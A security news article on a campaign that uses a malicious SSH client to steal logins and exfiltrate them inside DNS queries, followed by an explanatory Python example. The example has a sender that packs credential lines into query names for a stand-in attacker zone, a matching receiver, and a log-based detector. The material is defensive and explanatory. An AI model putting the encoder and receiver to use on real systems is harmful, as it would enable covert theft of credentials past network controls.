New Credential-Theft Attack Weaponizes DNS
The recently discovered campaign sends stolen data out of the network as part of a DNS query.
A new credential-theft attack campaign is using DNS to exfiltrate data. The campaign, which uses an illicit SSH client to gather the credentials, sends the purloined data to a pair of command-and-control (C2) servers.
Researchers at Alert Logic have found activity from this campaign dating back to August 9. In the attack, the malicious SSH client captures login credentials and sends them to the C2 server inside DNS queries. Because outbound DNS is almost universally permitted and rarely inspected at the query-name level, standard network protection systems are not likely to stop the transfer automatically.
According to the blog post announcing the discovery, the campaign's file hashes are not yet recognized by standard endpoint protection packages. The researchers recommend blocking all traffic to 164[.]132[.]181[.]85 and 194[.]99[.]23[.]199 to protect against the campaign.
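To make the mechanism concrete, here is an added example; it is not Alert Logic's code and not the campaign's actual encoding, which the report does not detail. It shows a sender that packs stolen credential lines into DNS query names under an assumed attacker-controlled zone (`exfil-zone.example`), the matching receiver, and a detector run over constructed resolver log lines that flags the pattern by label length, label entropy and per-domain subdomain volume. The log format, the zone name, the credential lines and the thresholds are all assumptions made for the example.

```python
import base64
import math
import re
from collections import defaultdict

# RFC 1035 limits that any DNS-carried exfiltration has to respect.
MAX_LABEL = 63   # octets per label
MAX_NAME = 253   # octets for a complete name in presentation form

ZONE = "exfil-zone.example"   # assumed attacker-controlled zone, not the campaign's

# ---- Sender side: packing stolen bytes into query names ----------------------
def encode_as_queries(data: bytes, zone: str = ZONE) -> list[str]:
    """Return the query names a tunnel would emit to carry `data` to the zone's
    authoritative server. Layout (assumed for this example):
    <seq>.<chunk>[.<chunk>].<zone>, base32 so the payload survives
    case-insensitive resolvers and retries."""
    payload = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    chunks = [payload[i:i + MAX_LABEL] for i in range(0, len(payload), MAX_LABEL)]
    names = []
    for seq, i in enumerate(range(0, len(chunks), 2)):
        name = ".".join([str(seq), *chunks[i:i + 2], zone])
        assert len(name) <= MAX_NAME   # two 63-octet labels plus seq and zone fit
        names.append(name)
    return names

def decode_queries(names: list[str], zone: str = ZONE) -> bytes:
    """Receiver side: reassemble the payload from the queries (any order)."""
    parts = {}
    for name in names:
        labels = name[: -len(zone) - 1].split(".")   # drop ".<zone>"
        parts[int(labels[0])] = "".join(labels[1:])
    payload = "".join(parts[k] for k in sorted(parts))
    payload += "=" * (-len(payload) % 8)             # restore base32 padding
    return base64.b32decode(payload, casefold=True)

# ---- Detector side: spotting the pattern in resolver query logs ---------------
# Constructed log format: "<time> <client> <qtype> <qname>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qtype>[A-Z]+)\s+(?P<qname>\S+)$")

def shannon_entropy(s: str) -> float:
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def registered_domain(qname: str) -> str:
    # Naive: last two labels. Use the Public Suffix List in production.
    return ".".join(qname.split(".")[-2:])

def analyze(lines, min_label=30, min_entropy=3.0, min_unique=3, min_payload=200):
    """Return {registered_domain: [reasons]} for domains whose queries look like a tunnel.
    Thresholds are assumptions; tune them against your own baseline traffic."""
    subs_per_domain = defaultdict(set)
    reasons = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        qname = m["qname"].rstrip(".").lower()
        dom = registered_domain(qname)
        sub = qname[: -len(dom)].rstrip(".") if qname != dom else ""
        subs_per_domain[dom].add(sub)
        longest = max(sub.split("."), key=len) if sub else ""
        if len(longest) >= min_label and shannon_entropy(longest) >= min_entropy:
            reasons[dom].add("long high-entropy label")
    for dom, subs in subs_per_domain.items():
        # Many distinct subdomains carrying lots of characters = data volume, not lookups.
        if len(subs) >= min_unique and sum(map(len, subs)) >= min_payload:
            reasons[dom].add("high subdomain volume")
    return {dom: sorted(r) for dom, r in reasons.items()}

# ---- Constructed sample data ---------------------------------------------------
CREDENTIALS = b"".join(
    f"user={u};pass={p};host={h}\n".encode() for u, p, h in [
        ("alice", "hunter2", "10.0.0.5"), ("bob", "Passw0rd!", "10.0.0.6"),
        ("carol", "s3cret", "10.0.0.7"), ("dave", "letmein", "10.0.0.8"),
        ("erin", "qwerty123", "10.0.0.9")])

BENIGN_LOG = [   # constructed benign resolver lines
    "10:00:01 10.0.0.5 A www.example.com",
    "10:00:02 10.0.0.5 AAAA mail.example.com",
    "10:00:03 10.0.0.7 A cdn-assets.static.example.net",
]

def sample_log() -> list[str]:
    """Benign lines plus the tunnel traffic one infected host would produce."""
    exfil = [f"10:01:{i:02d} 10.0.0.5 TXT {n}"
             for i, n in enumerate(encode_as_queries(CREDENTIALS))]
    return BENIGN_LOG + exfil

if __name__ == "__main__":
    for dom, why in analyze(sample_log()).items():
        print(dom, why)
```

Two points the example makes. First, the whole payload fits in three queries, so volume alone will not stand out in a busy resolver log; the long, high-entropy leftmost labels are the more reliable signal. Second, the IP block recommended above only helps if the infected host sends its queries straight to the C2 addresses. If it uses the organization's recursive resolver, the resolver is the system that contacts the attacker's authoritative server, and only the query names in the resolver's own logs reveal the transfer, so that is where to look.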